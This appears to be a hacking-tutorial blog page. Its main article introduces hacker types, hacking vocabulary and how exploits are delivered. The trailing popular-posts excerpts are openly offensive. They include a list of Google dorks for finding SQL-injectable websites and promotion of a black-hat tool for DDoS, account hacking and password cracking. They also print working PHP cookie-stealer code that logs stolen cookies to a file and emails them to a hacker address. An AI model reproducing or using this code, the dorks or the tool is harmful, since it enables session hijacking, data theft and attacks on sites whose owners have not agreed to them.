Skip to main content

Basic Of Hacking ( First Step of becoming a hacker)


For many people, hackers possess amazing skills and knowledge that can be used to access information systems and gather important data. The word "hacker" creates a vision of a teenage geek who enters some commands into his computer – and BAM! His device gives out confidential information such as passwords and account numbers. In the real world, a hacker simply needs to know how computer systems work and identify the tools that can be used to find security weaknesses. In this article, you will learn about the tools and techniques being used by professional hackers in attacking computer systems and gathering valuable information.
The world of hackers and how they work is a mystery to many security and computer experts. In general, hackers employ special software tools to collect digital info. By acquiring the same technical skills and using the same tools utilized by hackers, you can defend your computer systems and networks from mischievous attacks.
This article will introduce you to the "Hackers' World" and teach you the terms used in discussing digital security. Let's see the types of hackers you should know.



Three Types of Hackers
  • White Hat Hackers
These are the nice guys — the people who consider ethics whenever they apply their hacking skills. In general, these hackers are employed as security professionals. They use their hacking skills to identify weaknesses in a computer system and prepare countermeasures. Additionally, white hat hackers are the prime candidates for certification exams.
Before applying their tools and knowledge, "white hats" get the permission from the owner of the computer system. Acquiring permission prior to hacking any system is extremely important – it separates security professionals from malicious hackers.

  • Black Hat Hackers
These hackers are referred to as the bad guys — they use their skills for malicious or illegal purposes. They force their way into remote computer systems with bad intentions. Once they have hacked a system, "black hats" will remove important data, prevent legitimate users from accessing the system, and cause various problems for the owners of the data.
You can easily differentiate black hats from the white hats – black hat hackers have malicious intentions when accessing an account. This is how most people define hackers.

  • Gray Hat Hackers
These hackers may work defensively or offensively, depending on the scenario. This category is the dividing line between white hats and black hats. Basically, gray hats can be individuals who want to know how to hack but don't intend to use the knowledge for illegal purposes. These hackers claim that they consider ethics as an important factor when using their skills. They learned how to hack out of curiosity.
Gray hats can help system owners in improving their security features. By attacking a system, these hackers can identify a system's vulnerable spots. Afterward, they will share the information with the developers or managers of the computer system.

The Skillset of a Hacker

As a hacker, you should be familiar with computer-related topics such as networking, programming, and operating systems. You also need to master the most popular platforms (Unix, Linux, Windows, etc.) Because of the concentration level and amount of time involved in hacking, you must be patient, persistent, and perseverant.
Most hackers are knowledgeable about computers, programming, networking, and database management. Hackers are often hired as computer security experts – they find the weaknesses of any system using their tools and skills. In general, a hacker must know how to breach security systems — he/she doesn't need to know how to prevent or stop hacking attacks.


The Terms Used in Hacking

If you want to be a hacker, you should be familiar with the terms used by computer experts. Once you understand the language used by hackers, you are one step closer to joining their world. This article will help you to develop your "hacking vocabulary."

Exploit
This is a tool or technology that abuses glitches, bugs, and system vulnerabilities. Exploit often leads to denial of service, escalation of privileges, and unauthorized access. Black hat hackers start their attack by searching for exploits in the computer system they are targeting.

In general, exploits are short strings of code that, when entered into a computer system, exposes weaknesses. An experienced hacker can easily create his/her own exploits, but advanced programming skills are not required since there are lots of software programs created for hacking purposes. These computer programs have "precooked" exploits that can be used to attack computer networks or systems. For some hackers, an exploit is a specific method to break into a computer system through its own weaknesses.

Threat

This is a situation or environment that can lead to a possible violation of digital security. Hackers search for threats whenever they perform a security analysis. A hacker's techniques and computer programs are themselves threats to the information security of an organization.

Vulnerability
This refers to an error in logic design, software creation, or program implementation that can result to undesirable and unexpected events (e.g. system damages caused by bad instructions). Hackers use an exploit code to target a system's vulnerability. Once a fault is created or identified, the hacker will be able to acquire valuable information.

TOE (Target of Evaluation)

This is a network, system, or program that is the focus of a hacking attack or security analysis. Hackers are often working on important TOEs, computer systems that hold confidential information like passwords, account numbers, and Social Security numbers. The goal of a hacker is to use his tools and techniques against an important TOE to identify the vulnerabilities and fix them. Thus, they prevent unauthorized access to confidential data.

AttackThis happens when a system or network is compromised through its vulnerabilities. In general, attacks are performed using exploits. Hackers utilize tools to discover computer systems that are prone to an exploit because of its network configuration or operating system.


How Are Exploits Delivered to a Computer System?
You can send exploits in two different ways. These are:
  • Remote
With this method, the exploit is sent through a computer network. It allows hackers to attack a computer system even if they don’t have direct access to their target. In general, attacks that are initiated outside the targeted network or system are considered remote.
People imagine this type of attack whenever they think about hackers. In the real world, however, most hacking attacks fall under the next type.

  • Local
Here, the exploit is sent straight to the targeted network or system. Hackers can only use this method if they have prior access to the target. To prevent this type of attack, system and network owners create IT security regulations that provide each legitimate user with the minimum degree of access to do his/her job function. Thus, users cannot view or modify information that is irrelevant to their tasks.
The strategy outlined above sometimes called "least privilege" or "need to access," can prevent local delivery of exploits. It is important to note that most hacking attacks are "internal" (i.e. they are performed by people who belong to the organization). Before an insider can launch an attack, he/she should possess sufficient access to the confidential data. You can accomplish this by escalating the privileges given to you or exploiting the system's weaknesses.



Comments

Popular posts from this blog

Php And Google Dorks 2017

A Dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website. Here is a list of dorks to find SQL injectable websites. Google Dorks trainers.php?id= article.php?ID= play_old.php?id= declaration_more.php?decl_id= Pageid= games.php?id= newsDetail.php?id= staff_id= historialeer.php?num= product-item.php?id= news_view.php?id= humor.php?id= communique_detail.php?id= sem.php3?id= opinions.php?id= spr.php?id= pages.php?id= chappies.php?id= prod_detail.php?id= viewphoto.php?id= view.php?id= website.php?id= hosting_info.php?id= gery.php?id= detail.php?ID= publications.php?id= Productinfo.php?id= releases.php?id= ray.php?id= produit.php?id= pop.php?id= shopping.php?id= productdetail.php?id= post.php?id= section.php?id= theme.php?id= page.php?id= shredder-categories.php?id= product_ranges_view.php?ID= shop_category.php?id= channel_id=...

Download Hacking tool and library for rookie

Hello guy's, In today's post i will be sharing with guy's some useful Black-hat Hacking tool which is very very useful for beginners in hacking, Have been using this tool for the past few month, its a nice tool .This Tool can be used to password cracker, DDOS tool, email scraper, web spider, website hacking.This wonderful tool was develop by  hackerlord. Description Black-hat hacking tool to easily hack website, scrape email, port scanner, crack FTP password, launch DDOS attack, mysql injection, easily hijack website, web spider, website vulnerability scanner and social engineering tool. Features hacking tool email scraper facebook account hacking tool social engineering FTP password cracker web spider tool DDOS tool port scanner vulnerability scanner gmail account hacking tool easily shut a website down easily read and write data into a website database Download

Create cookie stealer in PHP? get via email

<?php     $cookie = $HTTP_GET_VARS[“cookie”];     $steal = fopen(“cookiefile.txt”, “a”);     fwrite($steal, $cookie .”\n”);     fclose($steal);     ?> $cookie = $HTTP_GET_VARS[“cookie”]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen(“cookiefile.txt”, “a”); This open the cookiefile in append mode so that we can append the stolen cookie. fwrite($steal, $cookie .”\n”); This will store the stolen cookie inside the file. fclose($steal); close the opened file. Another version: Sends cookies to the hacker mail     <?php     $cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider.com”, “Stolen Cookies”, $cookie);     ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject “Stolen cookies”. Third Version <?php     function GetIP()   ...